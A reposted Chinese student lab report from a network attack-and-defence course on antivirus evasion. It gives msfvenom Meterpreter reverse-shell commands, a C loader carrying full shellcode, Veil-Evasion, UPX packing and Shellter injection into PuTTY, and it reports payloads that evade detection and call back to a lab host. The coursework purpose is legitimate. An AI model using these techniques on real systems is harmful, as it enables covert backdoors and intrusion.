碼上歡樂
相關內容    簡體    繁體

2019-2020-2 20175317鍾睿文《網絡對抗技術》Exp3 免殺原理與實踐

本文轉載自   查看原文   2020-03-27 11:03   488 

2019-2020-2 20175317鍾睿文《網絡對抗技術》Exp3 免殺原理與實踐

1.1 實踐目標

(1)任務一:正確使用msf編碼器,msfvenom生成如jar之類的其他文件,veil-evasion,自己利用shellcode編程等免殺工具或技巧

(2)任務二:通過組合應用各種技術實現惡意代碼免殺

(3)任務三:用另一電腦實測,在殺軟開啟的情況下,可運行並回連成功,注明電腦的殺軟名稱與版本

1.2 基礎知識

  • 免殺原理

    • 免殺技術全稱為反殺毒技術Anti Anti- Virus簡稱“免殺”,它指的是一種能使病毒木馬免於被殺毒軟件查殺的技術。由於免殺技術的涉獵面非常廣,其中包含反匯編、逆向工程、系統漏洞等黑客技術,所以難度很高。其內容基本上都是修改病毒、木馬的內容改變特征碼,從而躲避了殺毒軟件的查殺。

    • 如果要做好免殺,就要清楚殺毒軟件(惡意軟件檢測工具)是如何工作的。AV(Anti-virus)是很大一個產業。

任務一:正確使用免殺工具或技巧

1.正確使用msf編碼器

在實驗二中已經生成了未經編碼處理exe類型的后門程序,將其放到VirusTotal或Virscan(網站鏈接在文末參考資料中)中查看結果,這里由於VirusTotal中的殺軟數量遠多於Virscan,所以我選擇了VirusTotal:

輸入圖片說明

由此可見不加任何處理的后門程序能夠被大多數殺軟檢測到,接下來用msf編碼器對后門程序進行一次到多次的編碼,並進行檢測

  • -e用來選擇編碼器
  • -b用來去除需要去除的字符,應使'\x00'不出現在shellcode中,因為shellcode以'\x00'為結束符
  • -i設置迭代次數,這里設置迭代次數為10

生成一次編碼的后門程序:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.122.136 LPORT=5317 -f exe > exp3.exe

輸入圖片說明

輸入圖片說明

生成十次編碼的后門程序:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.122.136 LPORT=5317 -f exe > encoded10.exe

輸入圖片說明

輸入圖片說明

由此可見經過編碼后雖然被檢測出的概率下降了,但是大多數殺軟還是可以將其檢測出來。

2.msfvenom生成如jar之類的其他文件

  • 生成jar文件:
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.122.136 LPORT=5317 x> 20175317jar.jar

VirusTotal檢測結果:

輸入圖片說明

  • 生成jsp文件:
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.122.136 LPORT=5317 x> 20175317jsp.jsp

VirusTotal檢測結果:

輸入圖片說明

  • 生成php文件:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.122.136 LPORT=5317 x> 20175317php.php

VirusTotal檢測結果:

輸入圖片說明

  • 生成apk文件:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.122.136 LPORT=5317 x> 20175317apk.apk

VirusTotal檢測結果:

輸入圖片說明

3.使用veil-evasion生成后門程序

使用sudo apt-get install veil進行veil的安裝

輸入圖片說明

安裝完成后提示有的部分沒有安裝成功,根據提示加后綴重新進行安裝:

輸入圖片說明

安裝完成后輸入veil命令,這里使用熱點進行安裝會快很多,這里安裝python會無響應……下載完成后會提示運行/usr/share/veil/config/setup.sh --force --silent

輸入圖片說明

但是在運行該指令時會反復提示找不到wine32,提示apt-get install wine32,但是安裝的時候又…… o_o ....

輸入圖片說明

上網查了一下,要執行如下指令安裝wine32

mkdir -p ~/.cache/wine
cd ~/.cache/wine 
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi

輸入圖片說明

之后把veil卸掉重新安裝一遍就能成功了:

輸入圖片說明

使用sudo運行veil,輸入use evasion

之后輸入命令use c/meterpreter/rev_tcp.py進入配置界面

輸入圖片說明

使用set LHOST 192.168.122.136設置反彈連接IP地址

使用set LPORT 5317設置端口

輸入圖片說明

使用generate命令生成文件,接着輸入生成的playload的名稱veil20175317,保存路徑為/var/lib/veil/output/source/veil20175317.exe

輸入圖片說明

按老規矩丟到virustotal中看看veil生成的隱蔽性如何 (●'◡'●)

輸入圖片說明

結果顯示我們費九牛二虎之力下的veil效果也不是太好,依然有過半的殺軟可以把它揪出來 ╯︿╰

4.使用C+shellcode編程生成后門程序

使用如下指令生成shellcode:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.122.136 LPORT=5317 -f c

創建20175317.c,將buf添加到代碼中

unsigned char buf[] = 
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54"
"\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x7a\x88"
"\x68\x02\x00\x14\xc5\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"
"\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
"\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67"
"\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff"
"\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00"
"\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56"
"\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58"
"\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5"
"\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85"
"\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1"
"\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";
int main() 
{ 
    int (*func)() = (int(*)())buf; 
    func(); 
}

使用i686-w64-mingw32-g++ 20175317.c -o 20175317.exe生成exe可執行文件

輸入圖片說明

丟到virustotal中看看效果:

輸入圖片說明

看樣子在大多數殺軟面前還是會露出狐狸尾巴……

5.加殼工具

使用命令upx 20175317.exe -o 20175317pro.exe對20175317.exe加殼

輸入圖片說明

上傳到virustotal中:

輸入圖片說明

加殼以后能夠檢測出的殺軟少了,但是過半的殺軟還是可以檢測出的。

6.其他方法

采用Veil-Evasion的其他荷載生成后門方式
進入evasion,使用list查看可用的有效荷載:

輸入圖片說明

我選擇的是第32個荷載,是Python下shellcode在DES下加密一種

輸入圖片說明

輸入option查看有效荷載的選項

輸入圖片說明

修改用戶名后使用generate生成,選擇shellcode平台時選擇2:msfvenom,payloads與IP、端口號使用tab自動獲取

輸入圖片說明

輸入圖片說明

輸入生成文件的文件名,選擇Py2Exe生成exe文件

輸入圖片說明

之后,生成的rc文件放入了路徑/var/lib/veil/output/handlers/中,可執行文件放入了/var/lib/veil/output/source/

將可執行文件上傳到virustotal中看看效果:

輸入圖片說明

輸入圖片說明

這下所有殺軟都沒有檢測出來 ○( ^皿^)っ

任務二:通過組合應用各種技術實現惡意代碼免殺(如果成功實現了免殺的,簡單語言描述原理,不要截圖。與殺軟共生的結果驗證要截圖。)

任務一中最后一個采用Veil-Evasion生成的Python下shellcode在DES下加密文件已經可以通過殺軟檢查,所以這步中我使用了Python下shellcode使用DES加密的載荷+加密殼生成的文件:

電腦環境:win10主機
殺毒引擎:火絨
殺軟版本:2.8.90.11211

木馬庫版本時間:2020-03-24

輸入圖片說明

PS:我在網上還查找找到了使用Shellter注入動態Shellcode注入來實現免殺的效果,當用戶打開被植入后門的軟件時,只有觸發一定的操作才會啟動后門。
執行apt-get install shellter安裝shellter,這里選擇AutoA

輸入圖片說明

然后輸入需要注入的exe文件路徑

輸入圖片說明

設置相應的地址與端口

輸入圖片說明

輸入圖片說明

最后就成功生成了

輸入圖片說明

放到主機中也沒有被查殺到,殺軟對動態shellcode好像反應不是那么靈敏:

輸入圖片說明

任務三:用另一電腦實測,在殺軟開啟的情況下,可運行並回連成功,注明電腦的殺軟名稱與版本

電腦環境:win10主機
殺毒引擎:火絨
殺軟版本:2.8.90.11211
木馬庫版本時間:2020-03-24

輸入圖片說明

實驗中遇到的問題

問題一:安裝veil的過程中一直提示缺少wine32,提示apt-get install wine32,安裝時又會顯示無法獲取

輸入圖片說明

問題一解決方案:在安裝前執行如下指令安裝wine32

mkdir -p ~/.cache/wine
cd ~/.cache/wine 
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi

輸入圖片說明

執行完成后就可以順利進行安裝了。

問題二:shellter輸入需要注入的exe文件路徑后注入失敗

輸入圖片說明

問題二解決方案:通過查詢了解到shellter需要注入SSH/Telnet程序以實現傳輸,所以需要下載PuTTY,PuTTY是一個免費的SSH/Telnet程序。此外,shellter的這個特性也限制了其應用,它只能用於局域網內。下載PuTTY后經過重新注入發現shellter可以注入到PuTTY.exe中。

實驗收獲與感想

在本次實驗過程中我使用了幾種不同的方法進行免殺嘗試,做出VirusTotal殺不出的惡意代碼時的感受比cs上段的感覺還要爽!
通過本次實踐我進一步理解了免殺原理,同時對殺毒軟件的可靠性有了新的認識( ̄▽ ̄)原來掃描后顯示沒有病毒不代表真的沒有病毒,所以我們要從源頭抓起,不瀏覽不安全的網頁,不下載運行不明文件,減少惡意代碼植入的機會。

問題回答

  • (1)殺軟是如何檢測出惡意代碼的?

a.通過檢測代碼中的特征碼或者某些特征片段,將其於自己的特征碼庫進行比對,如代碼中檢測出特征碼或者某些特征片段,就將其判定為惡意代碼。

b.監控進程行為有無異常,如果在運行時出現了非法越權行為等,就將其判定為惡意代碼。

  • (2)免殺是做什么?

通過對惡意代碼加殼或者進行編碼等操作,隱藏代碼中的特征碼或者某些特征片段,起到混淆視聽的作用,使得殺軟不容易檢測出該惡意代碼,起到免殺的作用。

  • (3)免殺的基本方法有哪些?

a.改變特征碼
使用encoder進行編碼、重新編譯生成可執行文件、加殼等手段改變特征碼

b.改變行為

使用加密通信、增加正常功能的代碼、使用隧道技術通訊等躲避或混淆殺毒軟件起到免殺的作用

開啟殺軟能絕對防止電腦中惡意代碼嗎?

不能,通過本次實驗已經能看出殺軟不能檢測出所有的惡意軟件,殺軟的病毒庫中如果沒有記錄該特征片段,或着沒有檢測該惡意代碼的有效手段則無法檢測到該惡意代碼,就不能及時殺掉電腦中的惡意代碼。

參考資料

VirusTotal
Virscan
Kali Linux之軟件安裝、卸載、更新和修改更新源
MSF-Shellcode生成和使用
簡介三款免殺工具(含BLACKHAT最新工具)


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 2019-2020-2 20175317鍾睿文《網絡對抗技術》Exp2 后門原理與實踐 2019-2020-2 20175215丁文韜《網絡對抗技術》Exp3 免殺原理與實踐 2019-2020-2 網絡對抗技術 20175205 Exp3 免殺原理與實踐 20175317鍾睿文 2019-2020-2 《網絡對抗技術》Exp0 環境搭建-Kali Linux 的安裝 2018-2019-2 網絡對抗技術 20165318 Exp3 免殺原理與實踐 2019-2020-2 20175215丁文韜《網絡對抗技術》Exp2 后門原理與實踐 2017-2018-2 20155303 『網絡對抗技術』Exp3:免殺原理與實踐 # 2019-2020-2 20175205侯穎《網絡對抗技術》Exp2 后門原理與實踐 2019-2020-2 20175215丁文韜《網絡對抗技術》Exp1 PC平台逆向破解 2019-2020-2 網絡對抗技術 20175327 蜂凱南 Exp7 網絡欺詐防范
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM